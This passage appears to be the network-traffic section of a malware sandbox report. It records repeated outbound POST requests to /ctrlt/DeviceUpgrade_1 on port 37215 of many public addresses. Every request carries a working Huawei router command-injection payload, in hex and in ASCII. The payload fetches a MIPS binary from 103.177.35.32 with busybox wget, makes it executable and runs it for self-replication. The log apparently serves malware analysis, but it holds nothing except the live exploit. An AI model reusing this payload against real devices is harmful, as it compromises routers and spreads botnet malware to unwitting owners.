                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3150192.168.2.234296641.121.192.16037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659255028 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3151192.168.2.2346968157.239.19.5437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659264088 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3152192.168.2.234590441.233.81.3337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659266949 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3153192.168.2.2345428203.211.218.5737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659276962 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3154192.168.2.2344432157.9.28.12937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659292936 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3155192.168.2.2337394157.169.67.20037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659523964 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3156192.168.2.2356698197.220.103.337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659548998 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3157192.168.2.234730641.114.148.12037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659554005 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3158192.168.2.2345028157.56.58.16837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659589052 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3159192.168.2.2357760157.102.126.25437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659641981 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
